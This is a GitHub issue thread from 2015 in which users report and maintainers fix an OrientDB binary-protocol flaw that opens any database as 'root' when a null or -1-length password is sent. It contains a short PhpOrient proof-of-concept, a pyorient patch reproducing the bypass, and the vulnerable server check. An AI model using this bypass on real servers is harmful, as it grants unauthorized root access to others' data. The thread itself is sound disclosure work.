Orientdb: security issue in binary protocol

Created on 20 May 2015  路  5Comments  路  Source: orientechnologies/orientdb

Hi,
I am having quite a security issue in the binary protocol in REQUEST_DB_OPEN. By setting user-name to "root" and user-password to 4 bytes xFF the db is opened regardless what the real root passwort is.

This can be reproduced by using the PhpOrient driver and the following code:

require 'PhpOrient/vendor/autoload.php';
use PhpOrient\PhpOrient;
$client = new PhpOrient( 'localhost', 2424 );
$client->dbOpen('GratefulDeadConcerts', 'root', null);
print_r($client->query( 'select from V' ));

I can use both null or an empty string "" as password here without knowing the real root password. PhpOrient transfers an empty password as pack('N', -1) which results in 4 Bytes xFF. This only works with "root", any other user (e.g. "admin") requires the proper password.

I posted this here since I think this is an issue in the binary protocol and not in PhpOrient. Is my configuration somehow wrong or can anybody confirm this behaviour? I tried this both with OrientDB 2.0.8 and 2.1-rc2.

bug
Source
picture micha-nerdlichter

Most helpful comment

Thank you for the confirmation. @lvca So this is pretty serious, right? I narrowed the problem down to Line 464 in OServer.java:

if (user != null && (iPassword == null || user.password.equals(iPassword))) {

iPassword == null I can't believe this! What kind of backdoor is that? I hope this is by design and the null password should be prevented on a higher level in the binary protocol.

picture micha-nerdlichter on 22 May 2015
😄4

All 5 comments

Hi @micha-nerdlichter
yes i can confirm, you're right. I tried also with my other driver pyorient ( hacking it a little bit ):

diff --git a/pyorient/messages/base.py b/pyorient/messages/base.py
index e56273a..e8b9c10 100644
--- a/pyorient/messages/base.py
+++ b/pyorient/messages/base.py
@@ -282,7 +282,10 @@ class BaseMessage(object):
             if sys.version_info[0] >= 3:
                 if isinstance( v, str ):
                     v = v.encode('utf-8')
-            _content = struct.pack("!i", len(v)) + v
+            if v == b'':
+                _content = struct.pack("!i", -1)
+            else:
+                _content = struct.pack("!i", len(v)) + v
         elif t['type'] == STRINGS:

Sending an empty string of length of -1 as root password, i can gain the access and root privileges.

Ostico picture Ostico on 22 May 2015

Thank you for the confirmation. @lvca So this is pretty serious, right? I narrowed the problem down to Line 464 in OServer.java:

if (user != null && (iPassword == null || user.password.equals(iPassword))) {

iPassword == null I can't believe this! What kind of backdoor is that? I hope this is by design and the null password should be prevented on a higher level in the binary protocol.

micha-nerdlichter picture micha-nerdlichter on 22 May 2015
😄4

This s covered by Java driver, but it's wrong: server side OrientDB should check this. Working on this right now.

lvca picture lvca on 22 May 2015

Fixed in develop (2.0.-SNAPSHOT). Fixing in 2.0.x (2.0.10-SNAPSHOT)

lvca picture lvca on 22 May 2015

Thanks @micha-nerdlichter for the report. We'll release 2.0.10 and 2.1-rc3 asap.

lvca picture lvca on 22 May 2015
Was this page helpful?
0 / 5 - 0 ratings

Related issues

schernolyas picture schernolyas  路  4Comments
careerscale picture careerscale  路  4Comments
andreyvk picture andreyvk  路  4Comments
saeedtabrizi picture saeedtabrizi  路  4Comments
f-hashemi picture f-hashemi  路  4Comments